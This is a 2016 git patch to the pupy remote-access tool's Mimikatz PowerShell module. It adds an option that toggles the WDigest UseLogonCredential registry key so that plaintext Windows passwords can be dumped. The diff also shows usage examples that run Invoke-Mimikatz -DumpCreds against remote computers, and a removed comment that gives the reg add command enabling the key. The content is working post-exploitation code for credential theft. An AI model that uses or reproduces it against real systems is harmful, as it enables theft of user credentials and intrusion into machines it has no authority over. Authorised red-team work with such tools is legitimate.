From 7aebdb55b6d9402934e5a3f648db3ce25143eb94 Mon Sep 17 00:00:00 2001 From: AlessandroZ Date: Fri, 18 Nov 2016 18:17:50 +0100 Subject: [PATCH] managing wdigest key --- pupy/modules/mimikatz_powershell.py | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/pupy/modules/mimikatz_powershell.py b/pupy/modules/mimikatz_powershell.py index 6b5886c2..d40cb0a7 100644 --- a/pupy/modules/mimikatz_powershell.py +++ b/pupy/modules/mimikatz_powershell.py @@ -4,6 +4,7 @@ import os import re from modules.lib.windows.powershell_upload import execute_powershell_script from pupylib.utils.credentials import Credentials +from pupylib.utils.rpyc_utils import redirected_stdio __class_name__="Mimikatz_Powershell" ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..")) @@ -23,11 +24,21 @@ Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2") Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1" ''' self.arg_parser = PupyArgumentParser(prog="Mimikatz_Powershell", description=self.__doc__, epilog=commands_available) + self.arg_parser.add_argument("--wdigest", choices={'check', 'enable', 'disable'}, default='', help="Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1") self.arg_parser.add_argument("-o", metavar='COMMAND', dest='command', default='Invoke-Mimikatz', help='command not needed') def run(self, args): - # check if windows 8.1 or Win2012 => reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 + # for windows 10, if the UseLogonCredential registry is not present or disable (equal to 0), not plaintext password can be retrieved using mimikatz. + if args.wdigest: + self.client.load_package("pupwinutils.wdigest") + with redirected_stdio(self.client.conn): + ok, message = self.client.conn.modules["pupwinutils.wdigest"].wdigest(args.wdigest) + if ok: + self.success(message) + else: + self.warning(str(message)) + return script ='mimikatz'